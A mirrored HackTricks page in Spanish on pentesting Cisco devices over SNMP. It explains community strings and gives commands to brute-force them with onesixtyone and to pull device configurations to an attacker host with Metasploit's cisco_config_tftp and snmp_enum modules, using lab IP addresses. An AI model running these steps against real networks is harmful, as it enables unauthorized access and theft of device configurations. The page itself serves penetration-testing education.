mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
75 lines
6.6 KiB
Markdown
75 lines
6.6 KiB
Markdown
# Cisco SNMP
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de exclusivos [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PRs al [repositorio hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
Esta página fue copiada de [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
|
|
|
## Exfiltración y enumeración de configuración a través de SNMP <a href="#e21c" id="e21c"></a>
|
|
|
|
**SNMP (Simple Network Management Protocol)** es un protocolo que permite monitorear el estado de los dispositivos en una red informática. Puede ser equipo de red, teléfonos IP, servidores corporativos o cualquier otra cosa.
|
|
|
|
**SNMP utiliza el protocolo de capa de transporte UDP con los números de puerto 161/UDP y 162/UDP.** Se utilizan cadenas de comunidad para referir los agentes SNMP al servidor. Estas son, podríamos decir, contraseñas especiales para comunicarse con el servidor SNMP. **Las cadenas de comunidad tienen permisos de solo lectura (RO) o de lectura y escritura (RW).**
|
|
|
|
**En realidad, SNMP no solo puede monitorear el estado del equipo, sino también administrarlo por completo: volcar configuraciones, cambiar la configuración, etc.** Si un pentester puede buscar el valor de las cadenas de comunidad, en realidad obtiene acceso al equipo. **Sin embargo, todo depende de qué cadena bruteforceó, si la cadena de comunidad RO o RW.**
|
|
|
|
**La fuerza bruta de las cadenas de comunidad se puede implementar utilizando la utilidad** [**onesixtyone**](https://github.com/trailofbits/onesixtyone). **Tomará como entrada el diccionario para la fuerza bruta y las direcciones IP de los hosts objetivo. Los objetivos serán:**
|
|
|
|
* **10.10.100.10 - Switch Cisco vIOS**
|
|
* **10.10.100.254 - Router Cisco vIOS**
|
|
```
|
|
~$ onesixtyone -c communitystrings -i targets
|
|
```
|
|
Descubrimos qué cadenas de comunidad se utilizan en esos dispositivos. Esto nos abre el camino para la explotación.
|
|
|
|
### 8.1 cisco\_config\_tftp <a href="#1dbf" id="1dbf"></a>
|
|
|
|
Con el framework Metasploit, específicamente con el módulo **cisco\_config\_tftp**, se puede extraer la configuración del dispositivo conociendo el valor de la cadena de comunidad. La cadena que tiene los derechos de RW es **private**.
|
|
|
|
Necesitaremos lo siguiente:
|
|
|
|
* **Cadena de comunidad RW (COMMUNITY)**
|
|
* **Dirección IP del atacante (LHOST)**
|
|
* **Dirección IP del equipo objetivo (RHOSTS)**
|
|
* **La ruta en la que el módulo produce la configuración del dispositivo (OUTPUTDIR)**
|
|
```bash
|
|
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY private
|
|
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 10.10.100.10
|
|
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set LHOST 10.10.100.50
|
|
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/necreas1ng/snmp
|
|
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > exploit
|
|
```
|
|
Después de iniciar el módulo, la configuración del host con la dirección 10.10.100.10 (10.10.100.10.txt) se descargará en la carpeta especificada.
|
|
|
|
![](<../../.gitbook/assets/image (223).png>)
|
|
|
|
### 8.2 snmp\_enum <a href="#3429" id="3429"></a>
|
|
|
|
Con este módulo puedes obtener información sobre el hardware objetivo. Todo es exactamente igual: especifica **COMMUNITY** (por cierto, incluso una cadena con permisos **RO** servirá) y la dirección IP del dispositivo objetivo.
|
|
```bash
|
|
msf6 auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY public
|
|
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.100.10
|
|
msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
|
|
```
|
|
<figure><img src="../../.gitbook/assets/image (218).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
|
|
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
|
|
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|